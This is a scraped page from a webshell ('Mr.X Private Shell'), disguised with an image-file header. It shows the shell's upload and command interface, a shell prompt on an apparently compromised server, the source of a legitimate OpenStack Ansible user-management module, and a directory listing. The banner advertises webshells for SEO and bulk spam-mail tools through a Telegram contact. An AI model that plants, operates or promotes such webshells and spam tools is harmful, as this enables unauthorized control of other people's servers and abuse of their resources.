����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

DOCUMENTATION = '''
---
module: identity_user
short_description: Manage OpenStack Identity Users
author: OpenStack Ansible SIG
description:
    - Manage OpenStack Identity users. Users can be created,
      updated or deleted using this module. A user will be updated
      if I(name) matches an existing user and I(state) is present.
      The value for I(name) cannot be updated without deleting and
      re-creating the user.
options:
   name:
     description:
        - Username for the user
     required: true
     type: str
   password:
     description:
        - Password for the user
     type: str
   update_password:
     required: false
     choices: ['always', 'on_create']
     default: on_create
     description:
        - C(always) will attempt to update password.  C(on_create) will only
          set the password for newly created users.
     type: str
   email:
     description:
        - Email address for the user
     type: str
   description:
     description:
        - Description about the user
     type: str
   default_project:
     description:
        - Project name or ID that the user should be associated with by default
     type: str
   domain:
     description:
        - Domain to create the user in if the cloud supports domains
     type: str
   enabled:
     description:
        - Is the user enabled
     type: bool
     default: 'yes'
   state:
     description:
       - Should the resource be present or absent.
     choices: [present, absent]
     default: present
     type: str
requirements:
    - "python >= 3.6"
    - "openstacksdk"

extends_documentation_fragment:
- openstack.cloud.openstack
'''

EXAMPLES = '''
# Create a user
- openstack.cloud.identity_user:
    cloud: mycloud
    state: present
    name: demouser
    password: secret
    email: demo@example.com
    domain: default
    default_project: demo

# Delete a user
- openstack.cloud.identity_user:
    cloud: mycloud
    state: absent
    name: demouser

# Create a user but don't update password if user exists
- openstack.cloud.identity_user:
    cloud: mycloud
    state: present
    name: demouser
    password: secret
    update_password: on_create
    email: demo@example.com
    domain: default
    default_project: demo

# Create a user without password
- openstack.cloud.identity_user:
    cloud: mycloud
    state: present
    name: demouser
    email: demo@example.com
    domain: default
    default_project: demo
'''


RETURN = '''
user:
    description: Dictionary describing the user.
    returned: On success when I(state) is 'present'
    type: dict
    contains:
        default_project_id:
            description: User default project ID. Only present with Keystone >= v3.
            returned: success
            type: str
            sample: "4427115787be45f08f0ec22a03bfc735"
        description:
            description: The description of this user
            returned: success
            type: str
            sample: "a user"
        domain_id:
            description: User domain ID. Only present with Keystone >= v3.
            returned: success
            type: str
            sample: "default"
        email:
            description: User email address
            returned: success
            type: str
            sample: "demo@example.com"
        id:
            description: User ID
            returned: success
            type: str
            sample: "f59382db809c43139982ca4189404650"
        enabled:
            description: Indicates whether the user is enabled
            type: bool
        name:
            description: Unique user name, within the owning domain
            returned: success
            type: str
            sample: "demouser"
        username:
            description: Username with Identity API v2 (OpenStack Pike or earlier) else Null
            returned: success
            type: str

'''

from ansible_collections.openstack.cloud.plugins.module_utils.openstack import OpenStackModule


class IdentityUserModule(OpenStackModule):
    argument_spec = dict(
        name=dict(required=True),
        password=dict(required=False, default=None, no_log=True),
        email=dict(required=False, default=None),
        default_project=dict(required=False, default=None),
        description=dict(type='str'),
        domain=dict(required=False, default=None),
        enabled=dict(default=True, type='bool'),
        state=dict(default='present', choices=['absent', 'present']),
        update_password=dict(default='on_create', choices=['always', 'on_create']),
    )

    module_kwargs = dict()

    def _needs_update(self, params_dict, user):
        for k in params_dict:
            # We don't get password back in the user object, so assume any supplied
            # password is a change.
            if k == 'password':
                return True
            if k == 'default_project':
                if user['default_project_id'] != params_dict['default_project']:
                    return True
                else:
                    continue
            if user[k] != params_dict[k]:
                return True
        return False

    def _get_domain_id(self, domain):
        dom_obj = self.conn.identity.find_domain(domain)
        if dom_obj is None:
            # Ok, let's hope the user is non-admin and passing a sane id
            return domain
        return dom_obj.id

    def _get_default_project_id(self, default_project, domain_id):
        project = self.conn.identity.find_project(default_project, domain_id=domain_id)
        if not project:
            self.fail_json(msg='Default project %s is not valid' % default_project)
        return project['id']

    def run(self):
        name = self.params['name']
        password = self.params.get('password')
        email = self.params['email']
        default_project = self.params['default_project']
        domain = self.params['domain']
        enabled = self.params['enabled']
        state = self.params['state']
        update_password = self.params['update_password']
        description = self.params['description']

        if domain:
            domain_id = self._get_domain_id(domain)
            user = self.conn.get_user(name, domain_id=domain_id)
        else:
            domain_id = None
            user = self.conn.get_user(name)

        changed = False
        if state == 'present':
            user_args = {
                'name': name,
                'email': email,
                'domain_id': domain_id,
                'description': description,
                'enabled': enabled,
            }
            if default_project:
                default_project_id = self._get_default_project_id(
                    default_project, domain_id)
                user_args['default_project'] = default_project_id
            user_args = {k: v for k, v in user_args.items() if v is not None}

            changed = False
            if user is None:
                if password:
                    user_args['password'] = password

                user = self.conn.create_user(**user_args)
                changed = True
            else:
                if update_password == 'always':
                    if not password:
                        self.fail_json(msg="update_password is always but a password value is missing")
                    user_args['password'] = password

                if self._needs_update(user_args, user):
                    user = self.conn.update_user(user['id'], **user_args)
                    changed = True

            self.exit_json(changed=changed, user=user)
        elif state == 'absent' and user is not None:
            self.conn.identity.delete_user(user['id'])
            changed = True
        self.exit_json(changed=changed)


def main():
    module = IdentityUserModule()
    module()


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
address_scope.py File 5.98 KB 0644
auth.py File 1.33 KB 0644
baremetal_inspect.py File 4.19 KB 0644
baremetal_node.py File 15.53 KB 0644
baremetal_node_action.py File 12.65 KB 0644
baremetal_node_info.py File 21.74 KB 0644
baremetal_port.py File 11.64 KB 0644
baremetal_port_info.py File 6.83 KB 0644
catalog_service.py File 5.12 KB 0644
coe_cluster.py File 8.7 KB 0644
coe_cluster_template.py File 12.24 KB 0644
compute_flavor.py File 7.71 KB 0644
compute_flavor_info.py File 7.79 KB 0644
compute_service_info.py File 3.56 KB 0644
config.py File 1.97 KB 0644
container.py File 5.92 KB 0644
dns_zone.py File 6.98 KB 0644
dns_zone_info.py File 5.16 KB 0644
endpoint.py File 6.34 KB 0644
federation_idp.py File 6.31 KB 0644
federation_idp_info.py File 2.21 KB 0644
federation_mapping.py File 5.18 KB 0644
federation_mapping_info.py File 2.15 KB 0644
floating_ip.py File 12.14 KB 0644
floating_ip_info.py File 6.12 KB 0644
group_assignment.py File 2.29 KB 0644
host_aggregate.py File 7.21 KB 0644
identity_domain.py File 4.71 KB 0644
identity_domain_info.py File 3.13 KB 0644
identity_group.py File 4.18 KB 0644
identity_group_info.py File 4.1 KB 0644
identity_role.py File 2.66 KB 0644
identity_role_info.py File 2.23 KB 0644
identity_user.py File 7.86 KB 0644
identity_user_info.py File 4.27 KB 0644
image.py File 8.77 KB 0644
image_info.py File 5.72 KB 0644
keypair.py File 4.44 KB 0644
keypair_info.py File 3.8 KB 0644
keystone_federation_protocol.py File 5.1 KB 0644
keystone_federation_protocol_info.py File 2.57 KB 0644
lb_health_monitor.py File 11.11 KB 0644
lb_listener.py File 8.93 KB 0644
lb_member.py File 6.71 KB 0644
lb_pool.py File 8.1 KB 0644
loadbalancer.py File 24.92 KB 0644
network.py File 8.03 KB 0644
networks_info.py File 4 KB 0644
neutron_rbac_policies_info.py File 8.27 KB 0644
neutron_rbac_policy.py File 10.53 KB 0644
object.py File 3.4 KB 0644
object_container.py File 5.92 KB 0644
os_auth.py File 1.33 KB 0644
os_client_config.py File 1.97 KB 0644
os_coe_cluster.py File 8.7 KB 0644
os_coe_cluster_template.py File 12.24 KB 0644
os_flavor_info.py File 7.79 KB 0644
os_floating_ip.py File 12.14 KB 0644
os_group.py File 4.18 KB 0644
os_group_info.py File 4.1 KB 0644
os_image.py File 8.77 KB 0644
os_image_info.py File 5.72 KB 0644
os_ironic.py File 15.53 KB 0644
os_ironic_inspect.py File 4.19 KB 0644
os_ironic_node.py File 12.65 KB 0644
os_keypair.py File 4.44 KB 0644
os_keystone_domain.py File 4.71 KB 0644
os_keystone_domain_info.py File 3.13 KB 0644
os_keystone_endpoint.py File 6.34 KB 0644
os_keystone_federation_protocol.py File 5.1 KB 0644
os_keystone_federation_protocol_info.py File 2.57 KB 0644
os_keystone_identity_provider.py File 6.31 KB 0644
os_keystone_identity_provider_info.py File 2.21 KB 0644
os_keystone_mapping.py File 5.18 KB 0644
os_keystone_mapping_info.py File 2.15 KB 0644
os_keystone_role.py File 2.66 KB 0644
os_keystone_service.py File 5.12 KB 0644
os_listener.py File 8.93 KB 0644
os_loadbalancer.py File 24.92 KB 0644
os_member.py File 6.71 KB 0644
os_network.py File 8.03 KB 0644
os_networks_info.py File 4 KB 0644
os_nova_flavor.py File 7.71 KB 0644
os_nova_host_aggregate.py File 7.21 KB 0644
os_object.py File 3.4 KB 0644
os_pool.py File 8.1 KB 0644
os_port.py File 16.46 KB 0644
os_port_info.py File 6.78 KB 0644
os_project.py File 6.33 KB 0644
os_project_access.py File 6.08 KB 0644
os_project_info.py File 4.51 KB 0644
os_quota.py File 15.99 KB 0644
os_recordset.py File 7.73 KB 0644
os_router.py File 21.82 KB 0644
os_routers_info.py File 5.55 KB 0644
os_security_group.py File 4.25 KB 0644
os_security_group_rule.py File 12.07 KB 0644
os_server.py File 26.5 KB 0644
os_server_action.py File 8.84 KB 0644
os_server_group.py File 4.12 KB 0644
os_server_info.py File 2.66 KB 0644
os_server_metadata.py File 4.84 KB 0644
os_server_volume.py File 3.67 KB 0644
os_stack.py File 7.76 KB 0644
os_subnet.py File 12.55 KB 0644
os_subnets_info.py File 4.51 KB 0644
os_user.py File 7.86 KB 0644
os_user_group.py File 2.29 KB 0644
os_user_info.py File 4.27 KB 0644
os_user_role.py File 5.65 KB 0644
os_volume.py File 7.8 KB 0644
os_volume_snapshot.py File 4.86 KB 0644
os_zone.py File 6.98 KB 0644
port.py File 16.46 KB 0644
port_info.py File 6.78 KB 0644
project.py File 6.33 KB 0644
project_access.py File 6.08 KB 0644
project_info.py File 4.51 KB 0644
quota.py File 15.99 KB 0644
recordset.py File 7.73 KB 0644
role_assignment.py File 5.65 KB 0644
router.py File 21.82 KB 0644
routers_info.py File 5.55 KB 0644
security_group.py File 4.25 KB 0644
security_group_info.py File 5.8 KB 0644
security_group_rule.py File 12.07 KB 0644
security_group_rule_info.py File 7.71 KB 0644
server.py File 26.5 KB 0644
server_action.py File 8.84 KB 0644
server_group.py File 4.12 KB 0644
server_info.py File 2.66 KB 0644
server_metadata.py File 4.84 KB 0644
server_volume.py File 3.67 KB 0644
stack.py File 7.76 KB 0644
stack_info.py File 2.44 KB 0644
subnet.py File 12.55 KB 0644
subnet_pool.py File 10.99 KB 0644
subnets_info.py File 4.51 KB 0644
volume.py File 7.8 KB 0644
volume_backup.py File 6.26 KB 0644
volume_backup_info.py File 2.9 KB 0644
volume_info.py File 3.65 KB 0644
volume_snapshot.py File 4.86 KB 0644
volume_snapshot_info.py File 3.43 KB 0644